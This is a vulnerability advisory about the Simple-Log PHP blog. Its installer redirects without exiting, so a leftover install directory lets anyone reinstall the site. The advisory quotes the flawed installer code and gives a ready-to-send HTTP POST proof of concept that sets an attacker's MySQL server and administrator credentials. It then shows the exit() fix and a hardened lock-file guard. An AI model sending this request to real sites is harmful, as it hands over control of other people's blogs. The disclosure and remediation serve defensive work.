The Simple-Log blog system is a blog system built in PHP + MySQL. If the install directory is not deleted after setup, an attacker can reinstall it.
If the install folder is left in place, a user can submit a remote MySQL account and password to install/index.php, causing Simple-Log to be re-installed. The vulnerability exists because the header() redirect is not followed by a call that ends the script.
In /install/index.php:
$setup = !empty($_POST['setup']) ? $_POST['setup'] : 'check';
if (file_exists(PBBLOG_ROOT . 'home/data/config.php'))
{
    require_once(PBBLOG_ROOT . 'home/data/config.php');
}
// Submitting setup=finish by POST is all that is needed to enter the installation process.
if ($install_lock && $setup != 'finish')
{
    // The redirect is not followed by code that ends the script. The vulnerability exists here.
    header('location: ../index.php');
}
.........
.........
elseif ($setup == 'finish')
{
    $error = array();
    if (empty($_POST['host']))
    {
        $error[] = 'Enter the database address';
    }
    if (empty($_POST['dbname']))
    {
        $error[] = 'Enter the database';
    }
    if (empty($_POST['dbuser']))
    {
        $error[] = 'Enter the database username';
    }
    if (empty($_POST['admin_user']))
    {
        $error[] = 'Enter the administrator account';
    }
    if (empty($_POST['admin_pass']))
    {
        $error[] = 'Enter the administrator password';
    }
    if (empty($_POST['blogname']))
    {
        $error[] = 'Enter the blog name';
    }
    if ($error)
    {
        echo '<p class="line">error message</p>';
        foreach ($error as $val)
        {
            echo "<p>$val</p>";
        }
        exit;
    }
    // Connection information for the MySQL database, taken directly from the request.
    $dbhost = $_POST['host'];
    $dbuser = $_POST['dbuser'];
    $dbpw = $_POST['dbpass'];
    $dbname = $_POST['dbname'];
    $charset = 'utf8';
    $db = new cls_mysql();
    if (!$db->connect($dbhost, $dbuser, $dbpw, $dbname, $charset, $pconnect))
    {
        $error[] = 'database connection error';
    }
    if (empty($_POST['dbprefix']))
    {
        $dbprefix = 'fb_';
    }
    else
    {
        $dbprefix = $_POST['dbprefix'];
    }
    // The submitted admin_user and admin_pass become the web administrator's account and password.
    $admin_user = $_POST['admin_user'];
    $admin_pass = $_POST['admin_pass'];
    $blogname = $_POST['blogname'];
    $blogdesc = $_POST['blogdesc'];
    $blog_keyword = $_POST['blogkeyword'];
    // The configuration file is written and the database updated; from then on Simple-Log uses the database submitted by the user.
PoC:
POST http://www.2cto.com/install/index.php HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64; U; Edition IBIS; zh-cn) Presto/2.10.229 Version/11.64
Host: www.xxx.com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: zh-CN, zh;q=0.9, en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://xxx/install/index.php
Proxy-Connection: Keep-Alive
Content-Length: 118
Content-Type: application/x-www-form-urlencoded

setup=finish&host=MYSQL_ADDRESS&dbname=DATABASE_NAME&dbuser=ACCOUNT&dbpass=PASSWORD&admin_user=ADMINISTRATOR_ACCOUNT&admin_pass=ADMINISTRATOR_PASSWORD&blogname=BLOG_NAME
Solution:
Add exit() after header():
if ($install_lock && $setup != 'finish')
{
    header('location: ../index.php');
    exit();
}
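The fix above stops execution after the redirect. As an added example, not Simple-Log's own code, here is an installer guard that also decides on a server-side lock file rather than on the POSTed setup value, and that writes the lock once installation finishes; the lock path and the function names are assumptions.

```php
<?php
// Added example (not Simple-Log's code): an installer entry guard that
// cannot be bypassed by request data. The lock-file path is an assumption.
define('INSTALL_LOCK', __DIR__ . '/../home/data/install.lock');

/**
 * Decide whether the installer may run. The decision depends only on
 * server-side state (the lock file), never on $_POST['setup'].
 */
function installer_allowed(): bool
{
    return !file_exists(INSTALL_LOCK);
}

/**
 * Redirect and terminate. header() merely queues a response header;
 * without exit() PHP keeps executing the rest of the script, which is
 * how the reinstall described on this page is reached.
 */
function redirect_and_stop(string $target): void
{
    header('Location: ' . $target, true, 302);
    exit;
}

if (!installer_allowed()) {
    redirect_and_stop('../index.php');
}

// Only a fresh install reaches this point.
$setup = !empty($_POST['setup']) ? $_POST['setup'] : 'check';
if ($setup === 'finish') {
    // ... validate input, write home/data/config.php, populate the database ...
    // Then create the lock so a second POST with setup=finish is refused.
    file_put_contents(INSTALL_LOCK, date('c'));
}
```

Deleting the install directory after setup remains the simplest protection; the lock file only limits the damage when that step is forgotten.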